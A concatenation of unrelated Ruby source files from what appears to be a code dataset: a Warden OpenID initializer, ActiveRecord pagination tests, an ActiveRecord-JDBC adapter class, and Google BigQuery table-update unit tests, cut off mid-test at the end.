t.decimal "total", precision: 8, scale: 2, default: "0.0", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "customer_id"
end
end
end
| 36.046512 | 81 | 0.624516 |
bf025eba3fee051238887acbab58a05e22f5d257 | 756 | Warden::OpenID.configure do |config|
config.required_fields = 'email'
config.optional_fields = %w(fullname)
config.user_finder do |response|
user = User.where( :identity_url => response.identity_url ).first
unless user
fields = OpenID::SReg::Response.from_success_response(response)
user = User.new :identity_url => response.identity_url, :email => fields['email'], :full_name => fields['fullname']
user.skip_confirmation!
user.save!
end
user
end
end
module OpenidMongodbStore
# load connection lazily
def self.database
@@database ||= Mongoid.database
end
end
Lojban::Application.config.middleware.insert_after( ActionDispatch::Session::CookieStore, Rack::OpenID, OpenidMongodbStore::Store.new )
| 31.5 | 135 | 0.727513 |
e9b8fc21ae17868b22a35d03467feb006fdac0cf | 4,200 | # frozen_string_literal: true
require 'test_helper'
if defined? ActiveRecord
class ActiveRecordRelationMethodsTest < ActiveSupport::TestCase
sub_test_case '#total_count' do
setup do
@author = User.create! name: 'author'
@author2 = User.create! name: 'author2'
@author3 = User.create! name: 'author3'
@books = 2.times.map {|i| @author.books_authored.create!(title: "title%03d" % i) }
@books2 = 3.times.map {|i| @author2.books_authored.create!(title: "title%03d" % i) }
@books3 = 4.times.map {|i| @author3.books_authored.create!(title: "subject%03d" % i) }
@readers = 4.times.map { User.create! name: 'reader' }
@books.each {|book| book.readers << @readers }
end
teardown do
Book.delete_all
User.delete_all
Readership.delete_all
end
test 'total_count on not yet loaded Relation' do
assert_equal 0, User.where('1 = 0').page(1).total_count
assert_equal 0, User.where('1 = 0').page(1).per(10).total_count
assert_equal 7, User.page(1).total_count
assert_equal 7, User.page(1).per(10).total_count
assert_equal 7, User.page(2).total_count
assert_equal 7, User.page(2).per(10).total_count
assert_equal 7, User.page(2).per(2).total_count
end
test 'total_count on loded Relation' do
assert_equal 0, User.where('1 = 0').page(1).load.total_count
assert_equal 0, User.where('1 = 0').page(1).per(10).load.total_count
assert_equal 7, User.page(1).load.total_count
assert_equal 7, User.page(1).per(10).load.total_count
assert_equal 7, User.page(2).load.total_count
assert_equal 7, User.page(2).per(10).load.total_count
assert_equal 7, User.page(2).per(2).load.total_count
end
test 'it should reset total_count memoization when the scope is cloned' do
assert_equal 1, User.page.tap(&:total_count).where(name: 'author').total_count
end
test 'it should successfully count the results when the scope includes an order which references a generated column' do
assert_equal @readers.size, @author.readers.by_read_count.page(1).total_count
end
test 'it should keep includes and successfully count the results when the scope use conditions on includes' do
# Only @author and @author2 have books titled with the title00x pattern
assert_equal 2, User.includes(:books_authored).references(:books).where("books.title LIKE 'title00%'").page(1).total_count
end
test 'when the Relation has custom select clause' do
assert_nothing_raised do
User.select('*, 1 as one').page(1).total_count
end
end
test 'it should ignore the options for rails 4.1+ when total_count receives options' do
assert_equal 7, User.page(1).total_count(:name, distinct: true)
end
test 'it should not throw exception by passing options to count when the scope returns an ActiveSupport::OrderedHash' do
assert_nothing_raised do
@author.readers.by_read_count.page(1).total_count(:name, distinct: true)
end
end
test "it counts the number of rows, not the number of keys, with an alias field" do
@books.each {|book| book.readers << @readers[0..1] }
assert_equal 8, Readership.select('user_id, count(user_id) as read_count, book_id').group(:user_id, :book_id).page(1).total_count
end
test "it counts the number of rows, not the number of keys without an alias field" do
@books.each {|book| book.readers << @readers[0..1] }
assert_equal 8, Readership.select('user_id, count(user_id), book_id').group(:user_id, :book_id).page(1).total_count
end
test "throw an exception when calculating total_count when the query includes column aliases used by a group-by clause" do
assert_equal 3, Book.joins(authorships: :user).select("users.name as author_name").group('users.name').page(1).total_count
end
test 'total_count is calculable with page 1 per "5" (the string)' do
assert_equal 7, User.page(1).per('5').load.total_count
end
end
end
end
| 44.680851 | 137 | 0.670714 |
0309164678ac4ce43a661db4639e1a426e3037b8 | 25,129 | require 'active_record/version'
require 'active_record/connection_adapters/abstract_adapter'
require 'arjdbc/version'
require 'arjdbc/jdbc/java'
require 'arjdbc/jdbc/base_ext'
require 'arjdbc/jdbc/connection_methods'
require 'arjdbc/jdbc/driver'
require 'arjdbc/jdbc/column'
require 'arjdbc/jdbc/connection'
require 'arjdbc/jdbc/callbacks'
require 'arjdbc/jdbc/extension'
require 'arjdbc/jdbc/type_converter'
require 'arjdbc/abstract/core'
require 'arjdbc/abstract/connection_management'
require 'arjdbc/abstract/database_statements'
require 'arjdbc/abstract/transaction_support'
module ActiveRecord
module ConnectionAdapters
# Built on top of `ActiveRecord::ConnectionAdapters::AbstractAdapter` which
# provides the abstract interface for database-specific functionality, this
# class serves 2 purposes in AR-JDBC :
# - as a base class for sub-classes
# - usable standalone (or with a mixed in adapter spec module)
#
# Historically this class is mostly been used standalone and that's still a
# valid use-case esp. since (with it's `arjdbc.jdbc.RubyJdbcConnectionClass`)
# JDBC provides a unified interface for all databases in Java it tries to do
# it's best implementing all `ActiveRecord` functionality on top of that.
# This might no be perfect that's why it checks for a `config[:adapter_spec]`
# module (or tries to resolve one from the JDBC driver's meta-data) and if
# the database has "extended" AR-JDBC support mixes in the given module for
# each adapter instance.
# This is sufficient for most database specific specs we support, but for
# compatibility with native (MRI) adapters it's perfectly fine to sub-class
# the adapter and override some of its API methods.
class JdbcAdapter < AbstractAdapter
include Jdbc::ConnectionPoolCallbacks
include ArJdbc::Abstract::Core
include ArJdbc::Abstract::ConnectionManagement
include ArJdbc::Abstract::DatabaseStatements
include ArJdbc::Abstract::TransactionSupport
attr_reader :prepared_statements
def self.new(connection, logger = nil, pool = nil)
adapter = super
Jdbc::JndiConnectionPoolCallbacks.prepare(adapter, adapter.instance_variable_get(:@connection))
adapter
end
# Initializes the (JDBC connection) adapter instance.
# The passed configuration Hash's keys are symbolized, thus changes to
# the original `config` keys won't be reflected in the adapter.
# If the adapter's sub-class or the spec module that this instance will
# extend in responds to `configure_connection` than it will be called.
# @param connection an (optional) connection instance
# @param logger the `ActiveRecord::Base.logger` to use (or nil)
# @param config the database configuration
# @note `initialize(logger, config)` with 2 arguments is supported as well
def initialize(connection, logger = nil, config = nil)
@config = config.respond_to?(:symbolize_keys) ? config.symbolize_keys : config
# FIXME: Rails 5 defaults to prepared statements on and we do not seem
# to work yet. So default to off unless it is requested until that is
# fixed.
@config[:prepared_statements] = false if !@config[:prepared_statements]
# NOTE: JDBC 4.0 drivers support checking if connection isValid
# thus no need to @config[:connection_alive_sql] ||= 'SELECT 1'
#
# NOTE: setup to retry 5-times previously - maybe do not set at all ?
@config[:retry_count] ||= 1
@config[:adapter_spec] = adapter_spec(@config) unless @config.key?(:adapter_spec)
spec = @config[:adapter_spec]
super(connection, logger, @config)
# kind of like `extend ArJdbc::MyDB if self.class == JdbcAdapter` :
klass = @config[:adapter_class]
extend spec if spec && ( ! klass || klass == JdbcAdapter)
end
# Returns the (JDBC) connection class to be used for this adapter.
# This is used by (database specific) spec modules to override the class
# used assuming some of the available methods have been re-defined.
# @see ActiveRecord::ConnectionAdapters::JdbcConnection
def jdbc_connection_class(spec)
connection_class = spec.jdbc_connection_class if spec && spec.respond_to?(:jdbc_connection_class)
connection_class ? connection_class : ::ActiveRecord::ConnectionAdapters::JdbcConnection
end
# Returns the (JDBC) `ActiveRecord` column class for this adapter.
# This is used by (database specific) spec modules to override the class.
# @see ActiveRecord::ConnectionAdapters::JdbcColumn
def jdbc_column_class
::ActiveRecord::ConnectionAdapters::JdbcColumn
end
# Locate the specialized (database specific) adapter specification module
# if one exists based on provided configuration data. This module will than
# extend an instance of the adapter (unless an `:adapter_class` provided).
#
# This method is called during {#initialize} unless an explicit
# `config[:adapter_spec]` is set.
# @param config the configuration to check for `:adapter_spec`
# @return [Module] the database specific module
def adapter_spec(config)
dialect = (config[:dialect] || config[:driver]).to_s
::ArJdbc.modules.each do |constant| # e.g. ArJdbc::MySQL
if constant.respond_to?(:adapter_matcher)
spec = constant.adapter_matcher(dialect, config)
return spec if spec
end
end
if (config[:jndi] || config[:data_source]) && ! config[:dialect]
begin
data_source = config[:data_source] ||
Java::JavaxNaming::InitialContext.new.lookup(config[:jndi])
connection = data_source.getConnection
config[:dialect] = connection.getMetaData.getDatabaseProductName
rescue Java::JavaSql::SQLException => e
warn "failed to set database :dialect from connection meda-data (#{e})"
else
return adapter_spec(config) # re-try matching a spec with set config[:dialect]
ensure
connection.close if connection # return to the pool
end
end
nil
end
ADAPTER_NAME = 'JDBC'.freeze
# @return [String] the 'JDBC' adapter name.
def adapter_name
ADAPTER_NAME
end
# @override
# Will return true even when native adapter classes passed in
# e.g. `jdbc_adapter.is_a? ConnectionAdapter::PostgresqlAdapter`
#
# This is only necessary (for built-in adapters) when
# `config[:adapter_class]` is forced to `nil` and the `:adapter_spec`
# module is used to extend the `JdbcAdapter`, otherwise we replace the
# class constants for built-in adapters (MySQL, PostgreSQL and SQLite3).
def is_a?(klass)
# This is to fake out current_adapter? conditional logic in AR tests
if klass.is_a?(Class) && klass.name =~ /#{adapter_name}Adapter$/i
true
else
super
end
end
# @deprecated re-implemented - no longer used
# @return [Hash] the AREL visitor to use
# If there's a `self.arel2_visitors(config)` method on the adapter
# spec than it is preferred and will be used instead of this one.
def self.arel2_visitors(config)
{ 'jdbc' => ::Arel::Visitors::ToSql }
end
# @deprecated re-implemented - no longer used
# @see #arel2_visitors
def self.configure_arel2_visitors(config)
visitors = ::Arel::Visitors::VISITORS
klass = config[:adapter_spec]
klass = self unless klass.respond_to?(:arel2_visitors)
visitor = nil
klass.arel2_visitors(config).each do |name, arel|
visitors[name] = ( visitor = arel )
end
if visitor && config[:adapter] =~ /^(jdbc|jndi)$/
visitors[ config[:adapter] ] = visitor
end
visitor
end
# DB specific types are detected but adapter specs (or extenders) are
# expected to hand tune these types for concrete databases.
# @return [Hash] the native database types
# @override
def native_database_types
@native_database_types ||= begin
types = @connection.native_database_types
modify_types(types)
types
end
end
# @override introduced in AR 4.2
def valid_type?(type)
! native_database_types[type].nil?
end
# Allows for modification of the detected native types.
# @param types the resolved native database types
# @see #native_database_types
def modify_types(types)
types
end
# Abstract adapter default implementation does nothing silently.
# @override
def structure_dump
raise NotImplementedError, "structure_dump not supported"
end
# JDBC adapters support migration.
# @return [true]
# @override
def supports_migrations?
true
end
# Returns the underlying database name.
# @override
def database_name
@connection.database_name
end
# @private
def native_sql_to_type(type)
if /^(.*?)\(([0-9]+)\)/ =~ type
tname, limit = $1, $2.to_i
ntypes = native_database_types
if ntypes[:primary_key] == type
return :primary_key, nil
else
ntypes.each do |name, val|
if name == :primary_key
next
end
if val[:name].downcase == tname.downcase &&
( val[:limit].nil? || val[:limit].to_i == limit )
return name, limit
end
end
end
elsif /^(.*?)/ =~ type
tname = $1
ntypes = native_database_types
if ntypes[:primary_key] == type
return :primary_key, nil
else
ntypes.each do |name, val|
if val[:name].downcase == tname.downcase && val[:limit].nil?
return name, nil
end
end
end
else
return :string, 255
end
return nil, nil
end
def columns(table_name, name = nil)
@connection.columns(table_name.to_s)
end
# @override
def supports_views?
@connection.supports_views?
end
# Similar to {#exec_query} except it returns "raw" results in an array
# where each rows is a hash with keys as columns (just like Rails used to
# do up until 3.0) instead of wrapping them in a {#ActiveRecord::Result}.
# @param sql the query string (or AREL object)
# @param name logging marker for the executed SQL statement log entry
# @param binds the bind parameters
# @yield [v1, v2] depending on the row values returned from the query
# In case a block is given it will yield each row from the result set
# instead of returning mapped query results in an array.
# @return [Array] unless a block is given
def exec_query_raw(sql, name = 'SQL', binds = [], &block)
if sql.respond_to?(:to_sql)
sql = to_sql(sql, binds); to_sql = true
end
if prepared_statements?
log(sql, name, binds) { @connection.execute_query_raw(sql, binds, &block) }
else
sql = suble_binds(sql, binds) unless to_sql # deprecated behavior
log(sql, name) { @connection.execute_query_raw(sql, &block) }
end
end
# @private
# @override
def select_rows(sql, name = nil, binds = [])
exec_query_raw(sql, name, binds).map!(&:values)
end
# Executes the SQL statement in the context of this connection.
# The return value from this method depends on the SQL type (whether
# it's a SELECT, INSERT etc.). For INSERTs a generated id might get
# returned while for UPDATE statements the affected row count.
# Please note that this method returns "raw" results (in an array) for
# statements that return a result set, while {#exec_query} is expected to
# return a `ActiveRecord::Result` (since AR 3.1).
# @note This method does not use prepared statements.
# @note The method does not emulate various "native" `execute` results on MRI.
# @see #exec_query
# @see #exec_insert
# @see #exec_update
def execute(sql, name = nil, binds = nil)
sql = suble_binds to_sql(sql, binds), binds if binds
if name == :skip_logging
_execute(sql, name)
else
log(sql, name) { _execute(sql, name) }
end
end
# We need to do it this way, to allow Rails stupid tests to always work
# even if we define a new `execute` method. Instead of mixing in a new
# `execute`, an `_execute` should be mixed in.
# @deprecated it was only introduced due tests
# @private
def _execute(sql, name = nil)
@connection.execute(sql)
end
private :_execute
# Kind of `execute(sql) rescue nil` but logging failures at debug level only.
def execute_quietly(sql, name = 'SQL')
log(sql, name) do
begin
_execute(sql)
rescue => e
logger.debug("#{e.class}: #{e.message}: #{sql}")
end
end
end
# @override
def tables(name = nil)
@connection.tables
end
# @override
def table_exists?(name)
return false unless name
@connection.table_exists?(name) # schema_name = nil
end
# @override
def data_sources
tables
end if ArJdbc::AR42
# @override
def data_source_exists?(name)
table_exists?(name)
end if ArJdbc::AR42
# @override
def indexes(table_name, name = nil, schema_name = nil)
@connection.indexes(table_name, name, schema_name)
end
# @override
def pk_and_sequence_for(table)
( key = primary_key(table) ) ? [ key, nil ] : nil
end
# @override
def primary_keys(table)
@connection.primary_keys(table)
end
# @override
def foreign_keys(table_name)
@connection.foreign_keys(table_name)
end if ArJdbc::AR42
# Does our database (+ its JDBC driver) support foreign-keys?
# @since 1.3.18
# @override
def supports_foreign_keys?
@connection.supports_foreign_keys?
end if ArJdbc::AR42
# @deprecated Rather use {#update_lob_value} instead.
def write_large_object(*args)
@connection.write_large_object(*args)
end
# @param record the record e.g. `User.find(1)`
# @param column the model's column e.g. `User.columns_hash['photo']`
# @param value the lob value - string or (IO or Java) stream
def update_lob_value(record, column, value)
@connection.update_lob_value(record, column, value)
end
if ActiveRecord::VERSION::MAJOR == 3 && ActiveRecord::VERSION::MINOR == 0
#attr_reader :visitor unless method_defined?(:visitor) # not in 3.0
# @private
def to_sql(arel, binds = nil)
# NOTE: can not handle `visitor.accept(arel.ast)` right
arel.respond_to?(:to_sql) ? arel.send(:to_sql) : arel
end
elsif ActiveRecord::VERSION::MAJOR < 3 # AR-2.3 'fake' #to_sql method
# @private
def to_sql(sql, binds = nil)
sql
end
end
protected
# @override so that we do not have to care having 2 arguments on 3.0
def log(sql, name = nil, binds = [])
unless binds.blank?
binds = binds.map do |column, value|
column ? [column.name, value] : [nil, value]
end
sql = "#{sql} #{binds.inspect}"
end
super(sql, name || 'SQL') # `log(sql, name)` on AR <= 3.0
end if ActiveRecord::VERSION::MAJOR < 3 ||
( ActiveRecord::VERSION::MAJOR == 3 && ActiveRecord::VERSION::MINOR < 1 )
# Take an id from the result of an INSERT query.
# @return [Integer, NilClass]
def last_inserted_id(result)
if result.is_a?(Hash) || result.is_a?(ActiveRecord::Result)
result.first.first[1] # .first = { "id"=>1 } .first = [ "id", 1 ]
else
result
end
end
# @private
def last_inserted_id(result)
if result.is_a?(Hash)
result.first.first[1] # .first = { "id"=>1 } .first = [ "id", 1 ]
else
result
end
end unless defined? ActiveRecord::Result
# NOTE: make sure if adapter overrides #table_definition that it will
# work on AR 3.x as well as 4.0
if ActiveRecord::VERSION::MAJOR > 3
# aliasing #create_table_definition as #table_definition :
alias table_definition create_table_definition
# `TableDefinition.new native_database_types, name, temporary, options`
# and ActiveRecord 4.1 supports optional `as` argument (which defaults
# to nil) to provide the SQL to use to generate the table:
# `TableDefinition.new native_database_types, name, temporary, options, as`
# @private
def create_table_definition(*args)
table_definition(*args)
end
# @note AR-4x arguments expected: `(name, temporary, options)`
# @private documented bellow
def new_table_definition(table_definition, *args)
if ActiveRecord::VERSION::MAJOR > 4
table_definition.new(*args)
else
table_definition.new native_database_types, *args
end
end
private :new_table_definition
# @private
def new_index_definition(table, name, unique, columns, lengths,
orders = nil, where = nil, type = nil, using = nil)
IndexDefinition.new(table, name, unique, columns, lengths, orders, where, type, using)
end
private :new_index_definition
#
# Provides backwards-compatibility on ActiveRecord 4.1 for DB adapters
# that override this and than call super expecting to work.
# @note This method is available in 4.0 but won't be in 4.1
# @private
def add_column_options!(sql, options)
sql << " DEFAULT #{quote(options[:default], options[:column])}" if options_include_default?(options)
# must explicitly check for :null to allow change_column to work on migrations
sql << " NOT NULL" if options[:null] == false
sql << " AUTO_INCREMENT" if options[:auto_increment] == true
end
public :add_column_options!
else # AR < 4.0
# Helper to easily override #table_definition (on AR 3.x/4.0) as :
# ```
# def table_definition(*args)
# new_table_definition(TableDefinition, *args)
# end
# ```
def new_table_definition(table_definition, *args)
table_definition.new(self) # args ignored only used for 4.0
end
private :new_table_definition
# @private (:table, :name, :unique, :columns, :lengths, :orders)
def new_index_definition(table, name, unique, columns, lengths,
orders = nil, where = nil, type = nil, using = nil)
IndexDefinition.new(table, name, unique, columns, lengths, orders)
end
# @private (:table, :name, :unique, :columns, :lengths)
def new_index_definition(table, name, unique, columns, lengths,
orders = nil, where = nil, type = nil, using = nil)
IndexDefinition.new(table, name, unique, columns, lengths)
end if ActiveRecord::VERSION::STRING < '3.2'
private :new_index_definition
end
# @return whether `:prepared_statements` are to be used
def prepared_statements?
return @prepared_statements unless (@prepared_statements ||= nil).nil?
@prepared_statements = self.class.prepared_statements?(config)
end
# Allows changing the prepared statements setting for this connection.
# @see #prepared_statements?
#def prepared_statements=(statements)
# @prepared_statements = statements
#end
def self.prepared_statements?(config)
config.key?(:prepared_statements) ?
type_cast_config_to_boolean(config.fetch(:prepared_statements)) :
false # off by default - NOTE: on AR 4.x it's on by default !?
end
if @@suble_binds = Java::JavaLang::System.getProperty('arjdbc.adapter.suble_binds')
@@suble_binds = Java::JavaLang::Boolean.parseBoolean(@@suble_binds)
else
@@suble_binds = ActiveRecord::VERSION::MAJOR < 4 # due compatibility
end
def self.suble_binds?; @@suble_binds; end
def self.suble_binds=(flag); @@suble_binds = flag; end
private
# @private Supporting "string-subling" on AR 4.0 would require {#to_sql}
# to consume binds parameters otherwise it happens twice e.g. for a record
# insert it is called during {#insert} as well as on {#exec_insert} ...
# but that than leads to other issues with libraries that save the binds
# array and run a query again since it's the very same instance on 4.0 !
def suble_binds(sql, binds)
sql
end
# @deprecated No longer used, kept for 1.2 API compatibility.
def extract_sql(arel)
arel.respond_to?(:to_sql) ? arel.send(:to_sql) : arel
end
if ActiveRecord::VERSION::MAJOR > 2
# Helper useful during {#quote} since AREL might pass in it's literals
# to be quoted, fixed since AREL 4.0.0.beta1 : http://git.io/7gyTig
def sql_literal?(value); ::Arel::Nodes::SqlLiteral === value; end
else
# @private
def sql_literal?(value); false; end
end
# Helper to get local/UTC time (based on `ActiveRecord::Base.default_timezone`).
def get_time(value)
get = ::ActiveRecord::Base.default_timezone == :utc ? :getutc : :getlocal
value.respond_to?(get) ? value.send(get) : value
end
protected
# @return whether the given SQL string is a 'SELECT' like
# query (returning a result set)
def self.select?(sql)
JdbcConnection::select?(sql)
end
# @return whether the given SQL string is an 'INSERT' query
def self.insert?(sql)
JdbcConnection::insert?(sql)
end
# @return whether the given SQL string is an 'UPDATE' (or 'DELETE') query
def self.update?(sql)
! select?(sql) && ! insert?(sql)
end
unless defined? AbstractAdapter.type_cast_config_to_integer
# @private
def self.type_cast_config_to_integer(config)
config =~ /\A\d+\z/ ? config.to_i : config
end
end
# @private
def self.type_cast_config_to_boolean(config)
config == 'false' ? false : (config == 'true' ? true : config)
end
public
# @note Used by Java API to convert dates from (custom) SELECTs (might get refactored).
# @private
def _string_to_date(value); jdbc_column_class.string_to_date(value) end
# @note Used by Java API to convert times from (custom) SELECTs (might get refactored).
# @private
def _string_to_time(value); jdbc_column_class.string_to_dummy_time(value) end
# @note Used by Java API to convert times from (custom) SELECTs (might get refactored).
# @private
def _string_to_timestamp(value); jdbc_column_class.string_to_time(value) end
if ActiveRecord::VERSION::STRING > '4.2'
# @private
@@_date = nil
# @private
def _string_to_date(value)
if jdbc_column_class.respond_to?(:string_to_date)
jdbc_column_class.string_to_date(value)
else
(@@_date ||= ActiveRecord::Type::Date.new).send(:cast_value, value)
end
end
# @private
@@_time = nil
# @private
def _string_to_time(value)
if jdbc_column_class.respond_to?(:string_to_dummy_time)
jdbc_column_class.string_to_dummy_time(value)
else
(@@_time ||= ActiveRecord::Type::Time.new).send(:cast_value, value)
end
end
# @private
@@_date_time = nil
# @private
def _string_to_timestamp(value)
if jdbc_column_class.respond_to?(:string_to_time)
jdbc_column_class.string_to_time(value)
else
(@@_date_time ||= ActiveRecord::Type::DateTime.new).send(:cast_value, value)
end
end
end
if ActiveRecord::VERSION::MAJOR < 4 # emulating Rails 3.x compatibility
JdbcConnection.raw_date_time = true if JdbcConnection.raw_date_time?.nil?
JdbcConnection.raw_boolean = true if JdbcConnection.raw_boolean?.nil?
elsif ArJdbc::AR42 # AR::Type should do the conversion - for better accuracy
JdbcConnection.raw_date_time = true if JdbcConnection.raw_date_time?.nil?
JdbcConnection.raw_boolean = true if JdbcConnection.raw_boolean?.nil?
end
end
end
end
| 36.738304 | 108 | 0.633929 |
7a6b66cae88753c19b8c1978e32f9e7827430e26 | 121 | def solution(position, array)
array.each_index do |index|
return index if array[index] == position
end
return -1
end | 20.166667 | 42 | 0.743802 |
03a0450f399c5a961db182ebd2d67af59a8b5a5c | 11,856 | # Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "helper"
describe Google::Cloud::Bigquery::Table, :update, :mock_bigquery do
let(:dataset_id) { "my_dataset" }
let(:table_id) { "my_table" }
let(:table_name) { "My Table" }
let(:description) { "This is my table" }
let(:labels) { { "foo" => "bar" } }
let(:table_gapi) { random_table_gapi dataset_id, table_id, table_name, description }
let(:table) { Google::Cloud::Bigquery::Table.from_gapi table_gapi,
bigquery.service }
let(:schema) { table.schema.dup }
let(:etag) { "etag123456789" }
it "updates its name" do
new_table_name = "My Updated Table"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, new_table_name, description
request_table_gapi = Google::Apis::BigqueryV2::Table.new friendly_name: "My Updated Table", etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
_(table.clustering_fields).must_be_nil
table.name = new_table_name
_(table.name).must_equal new_table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
_(table.clustering_fields).must_be_nil
mock.verify
end
it "updates its description" do
new_description = "This is my updated table"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, new_description
request_table_gapi = Google::Apis::BigqueryV2::Table.new description: "This is my updated table", etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.description = new_description
_(table.name).must_equal table_name
_(table.description).must_equal new_description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
mock.verify
end
it "updates time partitioning type" do
type = "DAY"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["timePartitioning"] = {
"type" => type,
}
partitioning = Google::Apis::BigqueryV2::TimePartitioning.new type: type
request_table_gapi = Google::Apis::BigqueryV2::Table.new time_partitioning: partitioning, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.time_partitioning_type = type
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_equal type
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
mock.verify
end
it "updates time partitioning field" do
field = "dob"
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["timePartitioning"] = {
"field" => field,
}
partitioning = Google::Apis::BigqueryV2::TimePartitioning.new field: field
request_table_gapi = Google::Apis::BigqueryV2::Table.new time_partitioning: partitioning, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.time_partitioning_field = field
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_equal field
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
mock.verify
end
it "updates time partitioning expiration" do
expiration = 86_400
expiration_ms = expiration * 1_000
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["timePartitioning"] = {
"expirationMs" => expiration_ms,
}
partitioning = Google::Apis::BigqueryV2::TimePartitioning.new expiration_ms: expiration_ms
request_table_gapi = Google::Apis::BigqueryV2::Table.new time_partitioning: partitioning, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.time_partitioning_expiration = expiration
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_equal expiration
_(table.require_partition_filter).must_equal true
mock.verify
end
it "updates require_partition_filter" do
mock = Minitest::Mock.new
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["requirePartitionFilter"] = false
request_table_gapi = Google::Apis::BigqueryV2::Table.new require_partition_filter: false, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal true
table.require_partition_filter = false
_(table.name).must_equal table_name
_(table.description).must_equal description
_(table.schema.fields.count).must_equal schema.fields.count
_(table.time_partitioning_type).must_be_nil
_(table.time_partitioning_field).must_be_nil
_(table.time_partitioning_expiration).must_be_nil
_(table.require_partition_filter).must_equal false
mock.verify
end
it "updates its labels" do
new_labels = { "bar" => "baz" }
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["labels"] = new_labels
request_table_gapi = Google::Apis::BigqueryV2::Table.new labels: new_labels, etag: etag
mock.expect :patch_table, return_table(table_hash),
[project, dataset_id, table_id, request_table_gapi, {options: {header: {"If-Match" => etag}}}]
mock.expect :get_table, return_table(table_hash), [project, dataset_id, table_id]
table.service.mocked_service = mock
_(table.labels).must_equal labels
table.labels = new_labels
_(table.labels).must_equal new_labels
mock.verify
end
it "updates its encryption" do
kms_key = "path/to/encryption_key_name"
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
table_hash = random_table_hash dataset_id, table_id, table_name, description
table_hash["encryptionConfiguration"] = { kmsKeyName: kms_key }
request_table_gapi = Google::Apis::BigqueryV2::Table.new encryption_configuration: Google::Apis::BigqueryV2::EncryptionConfiguration.new(kms_key_name: kms_key), etag: etag
